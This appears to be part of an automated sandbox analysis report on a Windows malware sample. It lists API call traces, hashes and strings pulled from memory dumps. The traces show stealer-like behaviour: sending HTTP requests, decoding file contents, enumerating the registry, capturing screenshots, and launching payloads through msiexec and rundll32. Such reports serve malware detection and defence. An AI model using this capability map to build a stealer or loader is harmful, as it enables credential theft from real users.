                                                                                  • lstrlen.KERNEL32(?), ref: 00B0D591
                                                                                  • lstrlen.KERNEL32(?), ref: 00B0D5A0
                                                                                  • memset.MSVCRT ref: 00B0D5EF
                                                                                    • Part of subcall function 00B1ACD7: StrCmpCA.SHLWAPI(0064A350,00B0AA0E,?,00B0AA0E,0064A350), ref: 00B1ACF6
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B0D61B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                  • String ID:
                                                                                  • API String ID: 1973479514-0
                                                                                  • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                                                  • Instruction ID: e5a704b9eebe2d5f2a61b5db34aad3dcaf0886d24ea1de323d3e28fdd5fc7f06
                                                                                  • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                                                  • Instruction Fuzzy Hash: A4E15E75951108ABCB08FBE0DD96DEE77B9BF14701F904199F106A60A1EE34BF84CB62
                                                                                  APIs
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A51
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A68
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A7F
                                                                                    • Part of subcall function 00B04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04AA0
                                                                                    • Part of subcall function 00B04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04AB0
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B05C5F
                                                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B05C7A
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B05DFA
                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 00B060D8
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B060E9
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B060FA
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B06101
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B06116
                                                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00B0612D
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0613F
                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B06158
                                                                                  • memcpy.MSVCRT(?), ref: 00B06165
                                                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00B06182
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B06196
                                                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00B061B3
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B06217
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B06224
                                                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B05E5F
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B0622E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                                                  • String ID:
                                                                                  • API String ID: 1703137719-0
                                                                                  • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                                                  • Instruction ID: 5c767d1e7456cd812935d456f97c578ab7966f9901c20c10789cbe5c67d23fa1
                                                                                  • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                                                  • Instruction Fuzzy Hash: 5D12CC71961228ABCB15EBA0DD95FEEB7B9BF14700F9041D9B10A62091EF702BC8CF51
                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                                                  • StrCmpCA.SHLWAPI(?,00906260), ref: 0040493A
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0090B9D0), ref: 00404DE8
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                                                  • HttpOpenRequestA.WININET(00000000,0090B870,?,0090B380,00000000,00000000,00400100,00000000), ref: 00404B15
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                  • String ID: "$"$------$------$------
                                                                                  • API String ID: 2402878923-2180234286
                                                                                  • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                                                  • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                                                  • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                                                  • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00909BD8,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                                                  • StrStrA.SHLWAPI(?,00909D28,00420B52), ref: 0040CAF7
                                                                                  • StrStrA.SHLWAPI(00000000,00909BF0), ref: 0040CB1E
                                                                                  • StrStrA.SHLWAPI(?,0090A290,00000000,?,00421458,00000000,?,00000000,00000000,?,00906100,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                                                  • StrStrA.SHLWAPI(00000000,0090A0D0), ref: 0040CCB9
                                                                                    • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                                                    • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00906020), ref: 0040C871
                                                                                    • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                                                    • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                                                  • StrStrA.SHLWAPI(?,0090A0D0,00000000,?,0042145C,00000000,?,00000000,00906020), ref: 0040CD5A
                                                                                  • StrStrA.SHLWAPI(00000000,009061E0), ref: 0040CD71
                                                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 3555725114-3916222277
                                                                                  • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                                                  • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                                                  • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                                                  • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 00B0CCD3
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00B0CCF0
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00B0CCFC
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B0CD0F
                                                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 00B0CD1C
                                                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B0CD40
                                                                                  • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 00B0CD5E
                                                                                  • StrStrA.SHLWAPI(00000000,0064A364), ref: 00B0CD85
                                                                                  • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 00B0CF09
                                                                                  • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 00B0CF20
                                                                                    • Part of subcall function 00B0CA87: memset.MSVCRT ref: 00B0CABA
                                                                                    • Part of subcall function 00B0CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B0CAD8
                                                                                    • Part of subcall function 00B0CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B0CAE3
                                                                                    • Part of subcall function 00B0CA87: memcpy.MSVCRT(?,?,?), ref: 00B0CB79
                                                                                  • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 00B0CFC1
                                                                                  • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 00B0CFD8
                                                                                    • Part of subcall function 00B0CA87: lstrcat.KERNEL32(?,00420B46), ref: 00B0CBAA
                                                                                    • Part of subcall function 00B0CA87: lstrcat.KERNEL32(?,00420B47), ref: 00B0CBBE
                                                                                    • Part of subcall function 00B0CA87: lstrcat.KERNEL32(?,00420B4E), ref: 00B0CBDF
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0D0AB
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B0D103
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 3555725114-3916222277
                                                                                  • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                                                  • Instruction ID: bc047a5ad41b23a2c803df24c9c9b2babd3bc55dbfe40530e94976e6c04d649f
                                                                                  • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                                                  • Instruction Fuzzy Hash: 35E1FF75911208ABCB14EBA4DD91EEEBBB9AF14700F404199F106B7191EF347AC9CF51
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00907C70,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                                                  • wsprintfA.USER32 ref: 00418459
                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                  • String ID: - $%s\%s$?
                                                                                  • API String ID: 3246050789-3278919252
                                                                                  • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                                                  • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                                                  • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                                                  • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • memset.MSVCRT ref: 00410C1C
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                                                  • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                                                  • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                                                  • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                                                  • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                                                  • memset.MSVCRT ref: 00410CCD
                                                                                  • memset.MSVCRT ref: 00410CE1
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                  • String ID: .exe
                                                                                  • API String ID: 1395395982-4119554291
                                                                                  • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                                                  • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                                                  • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                                                  • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                                                  APIs
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateGlobalStream
                                                                                  • String ID: image/jpeg
                                                                                  • API String ID: 2244384528-3785015651
                                                                                  • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                                                  • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                                                  • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                                                  • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                                                  APIs
                                                                                  • strtok_s.MSVCRT ref: 00411307
                                                                                  • strtok_s.MSVCRT ref: 00411750
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strtok_s$lstrcpylstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 348468850-0
                                                                                  • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                                                  • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                                                  • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                                                  • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell$lstrcpy
                                                                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                                                  • API String ID: 2507796910-3625054190
                                                                                  • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                                                  • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                                                  • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
